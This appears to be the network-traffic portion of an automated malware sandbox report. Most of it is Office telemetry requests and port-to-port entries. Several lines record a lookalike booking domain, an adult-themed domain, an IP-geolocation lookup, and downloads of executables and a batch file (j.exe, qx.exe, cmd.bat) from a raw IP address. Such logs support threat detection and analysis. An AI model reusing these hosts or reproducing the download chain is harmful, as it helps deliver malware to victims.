                Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global traffic HTTP traffic detected: GET /rq3xYUErWsFPbHiX.html HTTP/1.1 Accept: */* Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: adult-hub1990.cfd Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /a.mp4 HTTP/1.1 Host: 92.255.85.2 Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /j.exe HTTP/1.1 Host: 92.255.85.2
                Source: global traffic HTTP traffic detected: GET /qx.exe HTTP/1.1 Host: 92.255.85.2
                Source: global traffic HTTP traffic detected: GET /line HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /b.mp4 HTTP/1.1 Host: 92.255.85.2 Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /cmd.bat HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 92.255.85.2
                Source: global traffic DNS traffic detected: DNS query: roombedsrewiews.com
                Source: global traffic DNS traffic detected: DNS query: booking.roombedsrewiews.com
                Source: global traffic DNS traffic detected: DNS query: www.google.com
                Source: global traffic DNS traffic detected: DNS query: partner.booking.com
                Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
                Source: global traffic DNS traffic detected: DNS query: code.jquery.com
                Source: global traffic DNS traffic detected: DNS query: munchkin.marketo.net
                Source: global traffic DNS traffic detected: DNS query: 261-nrz-371.mktoresp.com
                Source: global traffic DNS traffic detected: DNS query: zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.com
                Source: global traffic DNS traffic detected: DNS query: siteintercept.qualtrics.com
                Source: global traffic DNS traffic detected: DNS query: adult-hub1990.cfd
                Source: global traffic DNS traffic detected: DNS query: ip-api.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
